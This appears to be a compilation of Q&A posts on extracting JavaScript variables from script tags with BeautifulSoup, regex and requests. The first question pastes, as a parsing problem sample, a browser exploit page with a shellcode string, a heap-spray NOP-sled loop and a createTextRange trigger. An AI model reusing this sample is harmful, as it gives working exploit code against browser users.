I'm trying to scrape a large amount of HTML files of unknown encodings. I chose the BeautifulSoup over the lxml parser because it's fast and has an easy API, but I find that it does not always manage to parse files due to its attempts to decode them as Unicode.
Now, I don't necessarily need it to decode the text in the HMTL, but rather identify the structure of the DOM and the included tags; if they contain more data I prefer to decode it myself.
I've tried excluding some encodings to overcome this problem, but this also doesn't always work.
Can this feature be disabled in some way?
Here's the base for my parser:
from bs4 import BeautifulSoup, Comment, Tag
class HTMLParser():
def __init__(self, data, exclude_encodings=None):
self.html_tree = BeautifulSoup(data, 'lxml', exclude_encodings=exclude_encodings)
self._tag_handlers = dict()
def start(self):
for node in self.html_tree.recursiveChildGenerator():
if isinstance(node, Tag):
if node.name in self._tag_handlers and self._tag_handlers[node.name] is not None:
self._tag_handlers[node.name](node)
elif isinstance(node, Comment):
self._handle_comment(node)
Tag handlers are loaded accordingly to what's needed to be parsed and how.
Also, here is a sample of the html that's causing the problem:
<html> <head> <script language="javascript"> var shellcode_str = "}yÒüiõ—·BxC‘¾¿f±© Ñâ=*ù²|4{öã'uH# ™´˜°q$áv?gN›’Ö¨%5I ,Ÿ(Ô“¸O-µA¶sFº‡øq!ë|+ü»~x'J¹B—¸=¶¾’“F9Õ·÷Ö/r?7CzNI:â$#ù–™wpg„ýf˜±A4º´²›%‘¨µy{ õt³,¿©O°v5GãþÀá2ÐÔ- K1à}<ŸuHyutB¿´ ø#kÔ²™‘˜¾»’CA#õ|fë?ý"ü-I ÖÓá/¶x7N,†ùwvzg}€â~ ¹%=±ºJ›sp'Ÿr5°¨H–4“ Kµ<ˆÕ— à$³©G{FqO¸·‰ã?Af·wq)ÿÇÆÁø–;á3ü{Nz ù…ë-~H¨›±º ³vu=C°0â}àtK™#¸$<¹©¶GJ¾|xg%Ÿ“B´’‘µsy ²p41Ö˜#Ô/ý;ãO—ÕI,»'F¿õr75†àköÀâzHu}KŒë Ÿp"á*÷ãv/´rO·~qf³’A ˜¹±B7=+Õ¿—C4N‡ø°»‘st,{F¾©IyÐÔƒý™g¸x5$%–|'“G-#?Jwõ0üº²¶›¨µ< ÓÖ„ùs w<¿°˜¸t âgCf7?¹»,(Ñãz} Òà¾3Ô¶´—Jº–%{Õ³·Ÿëý:õ±™µ“©u~pyvI’¨ø/GrFKqáH|)Ö!Áù‘…üxNzOq'u=²›{As8á$~5}4yàB|9ã#-™âCvÖtw4¾K» ü·F¿‘iý€õˆø7¶Jp›ºr x%µ“¹2ëGf‰ùB±5?© ˜/-¨’#O–=ŸÔ°—¸,²g³$<I´Õ'ANHÙÈÙt$ô¸ØÉZ•[+ɱH1CƒëüCâ-5²ÍÆC|D#r®2''~1eÄõž_{¿‘è6™œéö%r)˜Ù‰~zàAs{%¿|)þË/Þ‹ŽóUÇt‰Uªyužò<¸œ9ö3VÉ ’§28Úk ô×rI3¡Gµr5a”gâL&ȃŸ#0LûLŸs,ÅÛWè¸ö©kn©ÔÏ¡÷ØëŸéè`f{gR)×ïÞ¢ñè!™EfÜ"µ®våØŠ÷n2" Iœ€9\NhPS±ˆ[¹Ú"¡*ﲩ¸‡°© =O§£kÇP]6“Á¢íÙÂ)ŒÙl y*;o,5–Ñ£†[èáÃáßyÍw 2— ædý ŽÐ¥r«pç`‹z^Ô\j½Ÿfj‚IOèòÿ£0"; var nop_str = "ùHA"; var shellcode_total_length = 20 + shellcode_str.length; while(nop_str.length < shellcode_total_length) { nop_str += nop_str; } var nop_final = nop_str.substring(0,shellcode_total_length); var remaining_nops = nop_str.substring(0,nop_str.length-shellcode_total_length); while(remaining_nops.length + shellcode_total_length < 0x40000) { remaining_nops += nop_final; } var arr = new Array(); var counter = 0; var max_size = 2020; function func() { spain_id.innerHTML = Math.round((counter / max_size) * 100); if(counter < max_size) { arr.push(remaining_nops + shellcode_str); counter++; } else { spain_id.innerHTML = 100; element = document.createElement("input"); element.type = "image"; _FDPS = element.createTextRange(); } } function interval_func() { setInterval('func()', 5) } </script>
What happens is that the BeautifulSoup object is parsed without any children, even though it clearly has a script node, and so my start method is ineffective.
Related
I have the following javascript in the header of pages on my site:
<script type='text/javascript'>
var gaProperty = 'UA-00000000-1';
var disableStr = 'ga-disable-' + gaProperty;
if ( document.cookie.indexOf( disableStr + '=true' ) > -1 ) {
window[disableStr] = true;
}
function gaOptout() {
document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/';
window[disableStr] = true;
}
</script>
Im trying to extract the var gaProperty from each page (i.e UA-00000000-1) in a list of url's in a csv file using python. Im new to python and put together a script from bits of scripts ive seen around but it doesnt work:
from requests_html import HTMLSession
from urllib.request import urlopen
from bs4 import BeautifulSoup
import csv
import re
list = []
with open('list.csv','r') as csvf: # Open file in read mode
urls = csv.reader(csvf)
for url in urls:
list.append(url) # Add each url to list contents
for url in list:
page = urlopen(url[0]).read()
path = " ".join(url)
soup = BeautifulSoup(page, "lxml")
data = soup.find_all('script', type='text/javascript')
gaid = re.search(r'UA-[0-9]+-[0-9]+', data[0].text)
print(path, gaid)
The incorrect result i get is:
https:www.example.com/contact-us/ None
I need to achieve this desired output for each url:
https:www.example.com/contact-us/ UA-00000000-1
Any idea how to get this working in Python?
I would include the var gaProperty in the pattern, to be more specific, then ensure the capture group is lazily capturing everything between the ' that follow i.e. wrap the gaid value.
import re
html ='''
<script type='text/javascript'>
var gaProperty = 'UA-00000000-1';
var disableStr = 'ga-disable-' + gaProperty;
if ( document.cookie.indexOf( disableStr + '=true' ) > -1 ) {
window[disableStr] = true;
}
function gaOptout() {
document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/';
window[disableStr] = true;
}
</script>'''
gaid = re.search(r"var gaProperty = '(.*?)'", html).group(1)
print(f'https:www.example.com/contact-us/{gaid}')
I'm building a webscraper but got stuck in one problem. How to get that data value?
<script>
var store = {
data: 'ffggel4784hth4ve8bf5hhe8rh4b1d4g84usd9',
domain: 'www.domain.com'
};
</script>
I'm using python with requests and bs4.
x = Beautifulsoup.find('script')
data = x.text
I got output
var store = {
data: 'ffggel4784hth4ve8bf5hhe8rh4b1d4g84usd9',
domain: 'www.domain.com'
};
Now how to get that data value.
It is normal string so use string's functions like strip(), split(), replace(), slicing
For example
text = '''var store = {
data: 'ffggel4784hth4ve8bf5hhe8rh4b1d4g84usd9',
domain: 'www.domain.com'
};'''
lines = text.split('\n')
parts = lines[1].strip().split(': ')
name = parts[0]
data = parts[1].strip(',')[1:-1]
print(name, '=', data)
parts = lines[2].strip().split(': ')
name = parts[0]
data = parts[1].strip(',')[1:-1]
print(name, '=', data)
Result
data = ffggel4784hth4ve8bf5hhe8rh4b1d4g84usd9
domain = www.domain.com
I need a way to get informations from a web page. That info is stored in <script> tag and i can't find a way to extract it. Here is the last iteration of the code i used.
for link in urls:
driver.get(link)
#print(driver.title)
content = driver.page_source
soup = BeautifulSoup(content, features="html.parser")
for a in soup.findAll(string=['script', "EM.", "productFullPrice"]):
print (a)
name=a.find(string=['EM.sef_name'])
print(name);
print(a) and print(name) return nothing.
The source code i want to scrape looks like this:
<script type="text/javascript">
var EM = EM || {};
EM.CDN = 'link1';
EM.something = value;
If you're wanting the text inside the tag you can't just pass 'EM' to the string tag because it is looking for a string that exactly matches 'EM'. That also means it won't match the script tag either and will only look for the string script inside the tag itself. To get the node you need to pass script as a node to the findAll function. If you look at the text value of what's between the script tag it looks like this "\n var EM = EM || {};\n EM.CDN = 'link1';\n EM.something = value; \n ". So it won't find EM because EM isn't equal to that string I posted above. There are a couple ways you can go about this here is one I chose to help return values similar to what you posted:
import bs4
html_string = '''
<script type="text/javascript">
var EM = EM || {};
EM.CDN = 'link1';
EM.something = value;
</script>
'''
wanted_strings= string=["EM.", "productFullPrice"]
soup = bs4.BeautifulSoup(html_string, features="html.parser")
wanted=[]
test = soup.findAll('script')
for word in wanted_strings:
for tag in test:
if word in tag.text:
wanted.append(tag)
wanted
which will then give you the script lines in a list like this with the tags that contain the strings you need
[<script type="text/javascript">
var EM = EM || {};
EM.CDN = 'link1';
EM.something = value;
</script>]
Another way to do this is just look for the tag and then place each line of code in a list
import bs4
html_string = '''
<script type="text/javascript">
var EM = EM || {};
EM.CDN = 'link1';
EM.something = value;
</script>
'''
soup = bs4.BeautifulSoup(html_string, features="html.parser")
test = soup.findAll('script')
blah = [x.strip() for x in test[0].text.split('\n') if x.strip()]
blah
which gives you something like this that may be easier to search for what you need depending on your use case
['var EM = EM || {};', "EM.CDN = 'link1';", 'EM.something = value;']
I know this is asked before also, but I am a newbie in scraping and python. Please help me and it would be very much helpful in my learning path.
I am scraping a news site using python with packages such as Beautiful Soup and etc.
I am facing difficulty while getting the value of java script variable which is declared in script tag and also it is getting updated there.
Here is the part of HTML page which I am scraping:(containing only script part)
<!-- Eliminate render-blocking JavaScript and CSS in above-the-fold content -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/materialize/0.97.0/js/materialize.min.js"></script>
<script type="text/javascript" src="/dist/scripts/index.js"></script>
<script type="text/javascript" src="/dist/scripts/read.js"></script>
<script src="/dist/scripts/jquery.scrolldepth.min.js"></script>
<script type="text/javascript">
var min_news_id = "d7zlgjdu-1"; // line 1
function loadMoreNews(){
$("#load-more-btn").hide();
$("#load-more-gif").show();
$.post("/en/ajax/more_news",{'category':'politics','news_offset':min_news_id},function(data){
data = JSON.parse(data);
min_news_id = data.min_news_id||min_news_id; // line 2
$(".card-stack").append(data.html);
})
.fail(function(){alert("Error : unable to load more news");})
.always(function(){$("#load-more-btn").show();$("#load-more-gif").hide();});
}
jQuery.scrollDepth();
</script>
From the above part, I want to get the value of min_news_id in python.
I should also get the value of same variable if updated from line 2.
Here is how I am doing it:
self.pattern = re.compile('var min_news_id = (.+?);') // or self.pattern = re.compile('min_news_id = (.+?);')
page = bs(htmlPage, "html.parser")
//find all the scripts tag
scripts = page.find_all("script")
for script in scripts:
for line in script:
scriptString = str(line)
if "min_news_id" in scriptString:
scriptString.replace('"', '\\"')
print(scriptString)
if(self.pattern.match(str(scriptString))):
print("matched")
data = self.pattern.match(scriptString)
jsVariable = json.loads(data.groups()[0])
InShortsScraper.newsOffset = jsVariable
print(InShortsScraper.newsOffset)
But I am never getting the value of the variable. Is it problem with my regular expression or any other? Please help me.
Thank You in advance.
html = '''<!-- Eliminate render-blocking JavaScript and CSS in above-the-fold content -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/materialize/0.97.0/js/materialize.min.js"></script>
<script type="text/javascript" src="/dist/scripts/index.js"></script>
<script type="text/javascript" src="/dist/scripts/read.js"></script>
<script src="/dist/scripts/jquery.scrolldepth.min.js"></script>
<script type="text/javascript">
var min_news_id = "d7zlgjdu-1"; // line 1
function loadMoreNews(){
$("#load-more-btn").hide();
$("#load-more-gif").show();
$.post("/en/ajax/more_news",{'category':'politics','news_offset':min_news_id},function(data){
data = JSON.parse(data);
min_news_id = data.min_news_id||min_news_id; // line 2
$(".card-stack").append(data.html);
})
.fail(function(){alert("Error : unable to load more news");})
.always(function(){$("#load-more-btn").show();$("#load-more-gif").hide();});
}
jQuery.scrollDepth();
</script>'''
finder = re.findall(r'min_news_id = .*;', html)
print(finder)
Output:
['min_news_id = "d7zlgjdu-1";', 'min_news_id = data.min_news_id||min_news_id;']
#2 OR YOU CAN USE
print(finder[0].replace('min_news_id = ', '').replace('"','').replace(';','').strip())
Output:
d7zlgjdu-1
#3 OR YOU CAN USE
finder = re.findall(r'[a-z0-9]{8}-[0-9]', html)
print(finder)
Output:
['d7zlgjdu-1']
you can't monitor javascript variable change using BeautifulSoup, here how to get next page news using while loop, re and json
from bs4 import BeautifulSoup
import requests, re
page_url = 'https://inshorts.com/en/read/politics'
ajax_url = 'https://inshorts.com/en/ajax/more_news'
htmlPage = requests.get(page_url).text
# BeautifulSoup extract article summary
# page = BeautifulSoup(htmlPage, "html.parser")
# ...
# get current min_news_id
min_news_id = re.search('min_news_id\s+=\s+"([^"]+)', htmlPage).group(1) # result: d7zlgjdu-1
customHead = {'X-Requested-With': 'XMLHttpRequest', 'Referer': page_url}
while min_news_id:
# change "politics" if in different category
reqBody = {'category' : 'politics', 'news_offset' : min_news_id }
# get Ajax next page
ajax_response = requests.post(ajax_url, headers=customHead, data=reqBody).json() # parse string to json
# again, do extract article summary
page = BeautifulSoup(ajax_response["html"], "html.parser")
# ....
# ....
# new min_news_id
min_news_id = ajax_response["min_news_id"]
# remove this to loop all page (thousand?)
break
thank you for the response, Finally I solved using requests package after reading its documentation,
here is my code :
if InShortsScraper.firstLoad == True:
self.pattern = re.compile('var min_news_id = (.+?);')
else:
self.pattern = re.compile('min_news_id = (.+?);')
page = None
# print("Pattern: " + str(self.pattern))
if news_offset == None:
htmlPage = urlopen(url)
page = bs(htmlPage, "html.parser")
else:
self.loadMore['news_offset'] = InShortsScraper.newsOffset
# print("payload : " + str(self.loadMore))
try:
r = myRequest.post(
url = url,
data = self.loadMore
)
except TypeError:
print("Error in loading")
InShortsScraper.newsOffset = r.json()["min_news_id"]
page = bs(r.json()["html"], "html.parser")
#print(page)
if InShortsScraper.newsOffset == None:
scripts = page.find_all("script")
for script in scripts:
for line in script:
scriptString = str(line)
if "min_news_id" in scriptString:
finder = re.findall(self.pattern, scriptString)
InShortsScraper.newsOffset = finder[0].replace('min_news_id = ', '').replace('"','').replace(';','').strip()
I am trying to pull static_token, but I am definitely not on the right track. I pulled all the info that is javascript and my next step I figured was i needed to read it with JSON or turn it into JSON format as this is what i was told on my previous question. I tried to use regex to pull this as well, no luck on that end either, as pointed out in the comments I don't know what I'm doing. Can you point me in the right direction to pull the static_token and a brief description of what I need to actually do in these instances?
CODE
import requests
import json, re
from bs4 import BeautifulSoup
url =''' '''
response = requests.get(url)
soup1 = BeautifulSoup(response.text,'lxml')
html1 = soup1.find_all('script')[1] #.text
print(html1)
soup2 = BeautifulSoup(b'html1', 'lxml')
var = soup2.get('var static_token')
print(var)
My attempt with using regex -
static_token = re.findall(('static_token":"([^"]+)'), soup.text)
print(static_token)
Source I'm trying to pull the info
<script type="text/javascript">var CUSTOMIZE_TEXTFIELD = 1;
var FancyboxI18nClose = 'Close';
var FancyboxI18nNext = 'Next';
var FancyboxI18nPrev = 'Previous';
var contentOnly = false;
var roundMode = 2;
var static_token = '850424cb3feab732e072a3d84e378908';
var taxEnabled = 1;
var titleDelivery = '<h3 class="page-subheading">Your delivery address</h3>';
var titleInvoice = '<h3 class="page-subheading">Your billing address</h3>';
var token = '0c7a8347a263972696d6514dcfa24741';
var txtConditionsIsNotNeeded = 'You do not need to accept the Terms of Service for this order.';
var txtDeliveryAddress = 'Delivery address';
var txtErrors = 'Error(s)';
var txtFree = 'Free';
var txtThereis = 'There is';
var txtWithTax = '(tax incl.)';
var txtWithoutTax = '(tax excl.)';
var usingSecureMode = true;
var vat_management = 0;</script>
You are confusing a lot of data types in this question. This is not the only way to approach this (or the most robust) but it is simple and can point you in the right direction.
You seem to be able to read the html and extract the script tags from it using BeautifulSoup into html1.
You need to look at the documentation to understand the data types being used. I would also recommend adding statements like this in your code to help.
html1 = soup.find_all('script')
print('html1', type(html1), html1) # the type is bs4.element.ResultSet
This var contains all of the script tags from your document. You can iterate over the tags, and find the text fields for each tag. But it is NOT a JSON formatted type.
Once you have a string and you want part of that string - regex should be one of your first thoughts. You don't want to use regex on the original html - that's the whole point of the BS4 library and others like it. HTML is often mangled, messy, and not well-suited for simple regular expressions. Use BeautifulSoup to parse the html and find the section you want, THEN use regex to parse the string.
for tag in html1:
print('tag', type(tag), tag) # bs4.element.Tag
print()
print('tag.text', type(tag.text), tag.text) # str
print()
toks = re.findall("var static_token =\s*'(\w+)'", tag.text)
print('toks', type(toks), toks) # list
print()
static_token = toks[0]
print('static_token', type(static_token), static_token) # str
print()